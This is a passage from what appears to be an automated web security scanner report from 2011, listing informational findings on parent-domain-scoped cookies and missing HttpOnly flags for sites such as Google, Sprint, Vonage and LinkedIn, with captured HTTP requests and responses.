NID=46=L7ViPyWtNgzLloKqxgGugf0ueZUZZRmZC8lN4Wr85n3qEmY_KVWo1yeYY5svbWvHVQq7yYmiauvxIuVqLhSFztFYtygC1RWC7aK_H70ahmu-9-agEoiTnLTH1Iyycesj; expires=Fri, 11-Nov-2011 00:43:59 GMT; path=/; domain=.google.com; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAANsBmSEnaufGrFO2VVQlXFg.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=number+porting+lnp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=46=ShaN536VX1BT-W8jSCkNsB7UCdsHHBFwvL-fv0GuHA=AXsz92cQ6dNvC4Zp; PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:FF=0:TM=1303071569:LM=1304695017:GM=1:S=TtNIJs_fkMoJMWwR; NID=46=THnvL1Oo2rFB1EyPuENlypklsUgiuRDrggMizX7GcvuSEWk1O1BRhP0HMsig4_tUMgrpgSA4JfKinmjR9Q08mpbqo9YLMeQa1bwUSS3rWNSNQKH_51QqwF1Bj_TupkUW

Response

HTTP/1.1 200 OK
Set-Cookie: NID=46=L7ViPyWtNgzLloKqxgGugf0ueZUZZRmZC8lN4Wr85n3qEmY_KVWo1yeYY5svbWvHVQq7yYmiauvxIuVqLhSFztFYtygC1RWC7aK_H70ahmu-9-agEoiTnLTH1Iyycesj; expires=Fri, 11-Nov-2011 00:43:59 GMT; path=/; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Thu, 12 May 2011 00:43:59 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

12.5. http://metrics.connectedplanetonline.com/b/ss/primediateleph/1/H.22.1/s8270624386612 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://metrics.connectedplanetonline.com
Path:	/b/ss/primediateleph/1/H.22.1/s8270624386612

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

s_vi=[CS]v1|26E59718851D25A3-60000128800E6F4B[CE]; Expires=Tue, 10 May 2016 00:47:45 GMT; Domain=.connectedplanetonline.com; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/primediateleph/1/H.22.1/s8270624386612?AQB=1&ndh=1&t=11%2F4%2F2011%2019%3A46%3A54%203%20300&ce=UTF-8&ns=pentonmedia&pageName=bss_oss%3Anews%3APurchase%20from%20Evolving%20Systems%20will%20broaden%20Neustar%20numbering%20solutions%20business&g=http%3A%2F%2Fconnectedplanetonline.com%2Fbss_oss%2Fnews%2Fpurchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422%2F&cc=USD&ch=bss_oss&events=event18%2Cevent1&c2=connectedplanetonline.com&c6=article&c7=%2Fbss_oss%2Fnews%2Fpurchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422%2Findex.html&c9=By%20Joan%20Engebretson&c10=Apr%2022%2C%202011%2012%3A42%20PM&c13=Anonymous&c51=did%20not%20bounce&v51=Media%20Visions&c52=Direct%20Traffic&v52=Software%20%26%20Technology%3A%20Electrical%20Components&c53=Direct%20Traffic&v53=10&v54=5065&v55=Birmingham%2C%20AL%20%20%2035210&v56=Not%20Defined&v57=D%3Dch&c58=D%3DpageName&v58=D%3DpageName&v60=D%3DUser-Agent&v61=%2B1&v64=D%3Dc53&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1065&bh=964&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.connectedplanetonline.com
Proxy-Connection: keep-alive
Referer: http://connectedplanetonline.com/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: intro=1; s_pers=%20s_visit%3D1%7C1305163014885%3B%20s_depth%3D1%7C1305163014886%3B%20s_dirL%3D1%7C1305163014889%3B; s_sess=%20s_cc%3Dtrue%3B%20s_cm%3DundefinedDirect%2520LoadDirect%2520Load%3B%20gpb_tdt%3DDirect%2520Traffic%3B

Response

HTTP/1.1 302 Found
Date: Thu, 12 May 2011 00:47:45 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26E59718851D25A3-60000128800E6F4B[CE]; Expires=Tue, 10 May 2016 00:47:45 GMT; Domain=.connectedplanetonline.com; Path=/
Location: http://metrics.connectedplanetonline.com/b/ss/primediateleph/1/H.22.1/s8270624386612?AQB=1&pccr=true&vidn=26E59718851D25A3-60000128800E6F4B&&ndh=1&t=11%2F4%2F2011%2019%3A46%3A54%203%20300&ce=UTF-8&ns=pentonmedia&pageName=bss_oss%3Anews%3APurchase%20from%20Evolving%20Systems%20will%20broaden%20Neustar%20numbering%20solutions%20business&g=http%3A%2F%2Fconnectedplanetonline.com%2Fbss_oss%2Fnews%2Fpurchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422%2F&cc=USD&ch=bss_oss&events=event18%2Cevent1&c2=connectedplanetonline.com&c6=article&c7=%2Fbss_oss%2Fnews%2Fpurchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422%2Findex.html&c9=By%20Joan%20Engebretson&c10=Apr%2022%2C%202011%2012%3A42%20PM&c13=Anonymous&c51=did%20not%20bounce&v51=Media%20Visions&c52=Direct%20Traffic&v52=Software%20%26%20Technology%3A%20Electrical%20Components&c53=Direct%20Traffic&v53=10&v54=5065&v55=Birmingham%2C%20AL%20%20%2035210&v56=Not%20Defined&v57=D%3Dch&c58=D%3DpageName&v58=D%3DpageName&v60=D%3DUser-Agent&v61=%2B1&v64=D%3Dc53&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1065&bh=964&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.4.1
Expires: Wed, 11 May 2011 00:47:45 GMT
Last-Modified: Fri, 13 May 2011 00:47:45 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www268
Content-Length: 0
Content-Type: text/plain

12.6. http://metrics.sprint.com/b/ss/sprintuniversalsiteprod/1/H.22.1/s83234283372294 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://metrics.sprint.com
Path:	/b/ss/sprintuniversalsiteprod/1/H.22.1/s83234283372294

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

s_vi=[CS]v1|26E596F005010A07-4000010D201AEE12[CE]; Expires=Tue, 10 May 2016 00:46:24 GMT; Domain=.sprint.com; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/sprintuniversalsiteprod/1/H.22.1/s83234283372294?AQB=1&ndh=1&t=11%2F4%2F2011%2019%3A46%3A22%203%20300&ce=UTF-8&pageName=SU%20%3A%20SE%20%3A%20ART%20%3A%20case-wh164052-20100420-140547%20-%20Bring%20your%20existing%20number%20to%20Sprint&g=http%3A%2F%2Fsupport.sprint.com%2Fsupport%2Farticle%2FBring_your_existing_number_to_Sprint%2Fcase-wh164052-20100420-140547&r=http%3A%2F%2Fshop2.sprint.com%2Fen%2Fsupport%2Ffaq%2Fwlnp.shtml&cc=USD&ch=Support&server=support.sprint.com&events=event14&h1=Support%7CSU%20%3A%20Services%7CSU%20%3A%20Articles&h2=D%3Dg&c3=Not%20Authenticated&c4=SU%20%3A%20Services&c9=not%20logged-in&v13=D%3Dc40&v14=D%3Dc9&v20=D%3Dc3&c21=case-wh164052-20100420-140547&v29=D%3Dc43&v30=D%3Dch&c40=SU%20%3A%20Articles&c42=Shockwave%20Flash%2010.2%20r154&c43=support.sprint.com&v44=34CE0D747C31107C188BD6527E05D4BF&c45=Support%2BSU%20%3A%20SE%20%3A%20ART%20%3A%20case-wh164052-20100420-140547%20-%20Bring%20your%20existing%20number%20to%20Sprint&c46=7%3A30PM&c47=Wednesday&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1065&bh=964&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.sprint.com
Proxy-Connection: keep-alive
Referer: http://support.sprint.com/support/article/Bring_your_existing_number_to_Sprint/case-wh164052-20100420-140547
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=34CE0D747C31107C188BD6527E05D4BF; TLisset=true; s_cc=true; gpv_p37=Support; gpv_p38=SU%20%3A%20SE%20%3A%20ART%20%3A%20case-wh164052-20100420-140547%20-%20Bring%20your%20existing%20number%20to%20Sprint

Response

HTTP/1.1 302 Found
Date: Thu, 12 May 2011 00:46:24 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26E596F005010A07-4000010D201AEE12[CE]; Expires=Tue, 10 May 2016 00:46:24 GMT; Domain=.sprint.com; Path=/
Location: http://metrics.sprint.com/b/ss/sprintuniversalsiteprod/1/H.22.1/s83234283372294?AQB=1&pccr=true&vidn=26E596F005010A07-4000010D201AEE12&&ndh=1&t=11%2F4%2F2011%2019%3A46%3A22%203%20300&ce=UTF-8&pageName=SU%20%3A%20SE%20%3A%20ART%20%3A%20case-wh164052-20100420-140547%20-%20Bring%20your%20existing%20number%20to%20Sprint&g=http%3A%2F%2Fsupport.sprint.com%2Fsupport%2Farticle%2FBring_your_existing_number_to_Sprint%2Fcase-wh164052-20100420-140547&r=http%3A%2F%2Fshop2.sprint.com%2Fen%2Fsupport%2Ffaq%2Fwlnp.shtml&cc=USD&ch=Support&server=support.sprint.com&events=event14&h1=Support%7CSU%20%3A%20Services%7CSU%20%3A%20Articles&h2=D%3Dg&c3=Not%20Authenticated&c4=SU%20%3A%20Services&c9=not%20logged-in&v13=D%3Dc40&v14=D%3Dc9&v20=D%3Dc3&c21=case-wh164052-20100420-140547&v29=D%3Dc43&v30=D%3Dch&c40=SU%20%3A%20Articles&c42=Shockwave%20Flash%2010.2%20r154&c43=support.sprint.com&v44=34CE0D747C31107C188BD6527E05D4BF&c45=Support%2BSU%20%3A%20SE%20%3A%20ART%20%3A%20case-wh164052-20100420-140547%20-%20Bring%20your%20existing%20number%20to%20Sprint&c46=7%3A30PM&c47=Wednesday&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1065&bh=964&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.4.1
Expires: Wed, 11 May 2011 00:46:24 GMT
Last-Modified: Fri, 13 May 2011 00:46:24 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www105
Content-Length: 0
Content-Type: text/plain

12.7. http://metrics.vonage.com/b/ss/vonagevonagecomsubscribeprod/1/H.21/s84690568589139 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://metrics.vonage.com
Path:	/b/ss/vonagevonagecomsubscribeprod/1/H.21/s84690568589139

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

s_vi=[CS]v1|26E5977005079CA6-60000102A0076E90[CE]; Expires=Tue, 10 May 2016 00:50:40 GMT; Domain=.vonage.com; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/vonagevonagecomsubscribeprod/1/H.21/s84690568589139?AQB=1&ndh=1&t=11/4/2011%2019%3A50%3A39%203%20300&ns=vonage&pageName=lp_US_afflpdc_index&g=http%3A//www.vonage.com/lp/US/afflpdc/index.php&r=http%3A//www.vonage-forum.com/forum8.html&cc=USD&ch=US/VDV/Vonagecom&events=event7&h1=US/VDV/Vonagecom&c11=MainSite&v14=http%3A//www.vonage-forum.com/forum8.html&v15=www.vonage-forum.com&v18=Other%20Referrers-www.vonage-forum.com&v19=n/a&v20=Other%20Referrers&v23=Other%20Referrers-www.vonage-forum.com&v44=lp_US_afflpdc_index&c45=3&c46=8%3A30PM&v46=8%3A30PM&c47=Wednesday&v47=Wednesday&c48=Weekday&v48=Weekday&c49=New&v49=New&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1065&bh=964&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.vonage.com
Proxy-Connection: keep-alive
Referer: http://www.vonage.com/lp/US/afflpdc/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: refer_id=AFLGN090801001W1; LP=1%7E%7E; op471landingpagegum=a03o0bv0lg275ci0432m078ca; op471landingpageliid=a03o0bv0lg275ci0432m078ca; s_cc=true; s_nr=1305161439053-New; gpv_pageName=lp_US_afflpdc_index; s_cm=undefinedwww.vonage-forum.comwww.vonage-forum.com; s_cpmcvp=%5B%5B%27Other%2520Referrers-www.vonage-forum.com%27%2C%271305161439058%27%5D%5D

Response

HTTP/1.1 302 Found
Date: Thu, 12 May 2011 00:50:40 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26E5977005079CA6-60000102A0076E90[CE]; Expires=Tue, 10 May 2016 00:50:40 GMT; Domain=.vonage.com; Path=/
Location: http://metrics.vonage.com/b/ss/vonagevonagecomsubscribeprod/1/H.21/s84690568589139?AQB=1&pccr=true&vidn=26E5977005079CA6-60000102A0076E90&&ndh=1&t=11/4/2011%2019%3A50%3A39%203%20300&ns=vonage&pageName=lp_US_afflpdc_index&g=http%3A//www.vonage.com/lp/US/afflpdc/index.php&r=http%3A//www.vonage-forum.com/forum8.html&cc=USD&ch=US/VDV/Vonagecom&events=event7&h1=US/VDV/Vonagecom&c11=MainSite&v14=http%3A//www.vonage-forum.com/forum8.html&v15=www.vonage-forum.com&v18=Other%20Referrers-www.vonage-forum.com&v19=n/a&v20=Other%20Referrers&v23=Other%20Referrers-www.vonage-forum.com&v44=lp_US_afflpdc_index&c45=3&c46=8%3A30PM&v46=8%3A30PM&c47=Wednesday&v47=Wednesday&c48=Weekday&v48=Weekday&c49=New&v49=New&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1065&bh=964&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.4.1
Expires: Wed, 11 May 2011 00:50:40 GMT
Last-Modified: Fri, 13 May 2011 00:50:40 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www21
Content-Length: 0
Content-Type: text/plain

12.8. http://nextelonline.nextel.com/tl/set_tl.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://nextelonline.nextel.com
Path:	/tl/set_tl.html

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTSID=3E4B9B467C31107C1E2DA15A0F0D7966; Path=/; Domain=.nextel.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tl/set_tl.html?34CE0D747C31107C188BD6527E05D4BF HTTP/1.1
Host: nextelonline.nextel.com
Proxy-Connection: keep-alive
Referer: http://support.sprint.com/support/article/Bring_your_existing_number_to_Sprint/case-wh164052-20100420-140547
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Thu, 12 May 2011 00:46:16 GMT
Content-type: text/html
Set-Cookie: TLTSID=3E4B9B467C31107C1E2DA15A0F0D7966; Path=/; Domain=.nextel.com
Content-Length: 1439

<script>
   var cn="TLTSID"; // the cookie name
   var flag="TLisset=true"; // name/value for the "flag" cookie
   // array of domains for different environments (production is last as a catchall)
   // each
...[SNIP]...

12.9. http://pixel.quantserve.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.quantserve.com
Path:	/pixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

d=EN8AJe8kjVmM-5GL0ZmY8frRi58oyBABxQEB3QaB1QCa0aWZVw8Ys9HNGFnDDCAJKLPR1KLMUgsqOEwdP-EQwgDB8QggINIOIAnRO7YKkZLHQxIIILsywStxxIP-FMWRtTqB4eaRAE0gDokgDDAL4tGmog0bEJ0pOUo4sjA; expires=Wed, 10-Aug-2011 00:48:44 GMT; path=/; domain=.quantserve.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel;r=70613911;fpan=0;fpa=P0-487374334-1303349183888;ns=1;url=http%3A%2F%2Fmediacdn.disqus.com%2F1304984847%2Fbuild%2Fsystem%2Fdef.html%23xdm_e%3Dhttp%253A%252F%252Fconnectedplanetonline.com%26xdm_c%3Ddefault3812%26xdm_p%3D1%26;ref=http%3A%2F%2Fconnectedplanetonline.com%2Fbss_oss%2Fnews%2Fpurchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422%2F;ce=1;je=1;sr=1920x1200x16;enc=n;ogl=;dst=1;et=1305161240362;tzo=300;a=p-94WKwgUwZHlfo HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://mediacdn.disqus.com/1304984847/build/system/def.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4dab4f93-dea96-f475f-85ff7; d=EL4AJe8kjVmM-5GL0ZmY8frRi58oyBABxQEB3AaBtQCa0aWZVw8Ys9HNGFnDDCAJKLPR1KLMUgsqOEwdP-EQwgDB8QggINIOIAnRO7YKkZLHQxIIILsywStxxIP-FMWRtTqB4eaRAE0gDokgDDAL4tGmog0bEJ0pOUo4sjA

Response

HTTP/1.1 204 No Content
Connection: close
Set-Cookie: d=EN8AJe8kjVmM-5GL0ZmY8frRi58oyBABxQEB3QaB1QCa0aWZVw8Ys9HNGFnDDCAJKLPR1KLMUgsqOEwdP-EQwgDB8QggINIOIAnRO7YKkZLHQxIIILsywStxxIP-FMWRtTqB4eaRAE0gDokgDDAL4tGmog0bEJ0pOUo4sjA; expires=Wed, 10-Aug-2011 00:48:44 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Date: Thu, 12 May 2011 00:48:44 GMT
Server: QS

12.10. http://shop2.sprint.com/en/support/faq/wlnp.shtml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://shop2.sprint.com
Path:	/en/support/faq/wlnp.shtml

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTSID=34E27AE87C31107C188CD6527E05D4BF; Path=/; Domain=.sprint.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/support/faq/wlnp.shtml HTTP/1.1
Host: shop2.sprint.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Thu, 12 May 2011 00:46:00 GMT
Set-Cookie: TLTSID=34E27AE87C31107C188CD6527E05D4BF; Path=/; Domain=.sprint.com
Content-type: text/html
Content-Length: 324

<script type="text/javascript">location.replace('http://support.sprint.com/support/article/Bring_your_existing_number_to_Sprint/case-wh164052-20100420-140547');</script>

<meta http-equiv="refresh" c
...[SNIP]...

12.11. http://www.linkedin.com/companyInsider previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.linkedin.com
Path:	/companyInsider

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

lang="v=2&lang=en&c="; Version=1; Domain=linkedin.com; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /companyInsider?script&useBorder=no HTTP/1.1
Host: www.linkedin.com
Proxy-Connection: keep-alive
Referer: http://connectedplanetonline.com/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: visit=G; __qca=P0-87169230-1303163602430; bcookie="v=1&4d9675db-dcd4-4b34-bfd9-5f98cf2c89da"; __utmz=23068709.1304721517.5.2.utmcsr=socialfollow.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=23068709.2028061763.1303163602.1304000549.1304721517.5; __utmv=23068709.guest

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE"
Expires: 0
Pragma: no-cache
Cache-control: no-cache, must-revalidate, max-age=0
Set-Cookie: leo_auth_token="GST:8tR8AXa_H87sybQCohL0f5rN4fe7m5AJEEzQz9agYlq3KAZCF6aP-d:1305161207:bd31acd81eafdc11524936bd768546496be4bb6b"; Version=1; Max-Age=1799; Expires=Thu, 12-May-2011 01:16:46 GMT; Path=/
Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: JSESSIONID="ajax:8157137445058115307"; Version=1; Path=/
Set-Cookie: lang="v=2&lang=en&c="; Version=1; Domain=linkedin.com; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 00:46:46 GMT
Set-Cookie: NSC_MC_QH_MFP=ffffffffaf19964145525d5f4f58455e445a4a42198c;expires=Thu, 12-May-2011 01:18:01 GMT;path=/;httponly
Content-Length: 12412

(function() {

// Set up LinkedIn Global Namespace
if (typeof(LinkedIn) == 'undefined') {
LinkedIn = {};
}

// Utility functions
function $(element) {
return (typeof element == 'string') ?

...[SNIP]...

12.12. http://www.vonage.com/lp/US/afflpdc/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vonage.com
Path:	/lp/US/afflpdc/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

refer_id=AFLGN090801001W1; expires=Fri, 27-May-2011 00:50:29 GMT; path=/; domain=.vonage.com
LP=1%7E%7E; expires=Wed, 10-Aug-2011 00:50:30 GMT; path=/; domain=.vonage.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /lp/US/afflpdc/?refer_id=AFLGN090801001W1&promo_id=USVONRP2499NSC_WEB&deviceType=VDV21_FREE_UPSELL HTTP/1.1
Host: www.vonage.com
Proxy-Connection: keep-alive
Referer: http://www.vonage-forum.com/forum8.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

12.13. http://www.vonage.com/lp/US/afflpdc/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vonage.com
Path:	/lp/US/afflpdc/index.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

LP=1%7E%7E; expires=Wed, 10-Aug-2011 00:50:30 GMT; path=/; domain=.vonage.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lp/US/afflpdc/index.php HTTP/1.1
Host: www.vonage.com
Proxy-Connection: keep-alive
Referer: http://www.vonage-forum.com/forum8.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: refer_id=AFLGN090801001W1; LP=1%7E%7E

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:50:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Set-Cookie: LP=1%7E%7E; expires=Wed, 10-Aug-2011 00:50:30 GMT; path=/; domain=.vonage.com
Content-Type: text/html
Content-Length: 17336

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

13. Cookie without HttpOnly flag set previous next
There are 100 instances of this issue:

https://catalyst.fastcatalog.net/
https://lnp.activationnow.com/lnp/
http://s.clickability.com/s
https://support.connexon.com/custom/customimages/911_logo_trc.jpg.gif
https://support.connexon.com/custom/customimages/Custom_HeadLogo.gif
https://support.connexon.com/custom/customimages/portal-browse-solutions.gif
https://support.connexon.com/custom/customimages/portal-browse-ticket.gif
https://support.connexon.com/images/favicon.ico
https://support.connexon.com/images/spacer.gif
https://support.connexon.com/sd/SolutionsHome.sd
https://support.connexon.com/style/demo.css
https://support.connexon.com/style/style.css
http://support.sprint.com/support/article/Bring_your_existing_number_to_Sprint/case-wh164052-20100420-140547
http://www.911enable.com/business/contact_specialist.php
http://www.atis.org/
http://www.commpartnersconnect.com/company
http://www.job-search-engine.com/keyword/number-portability/
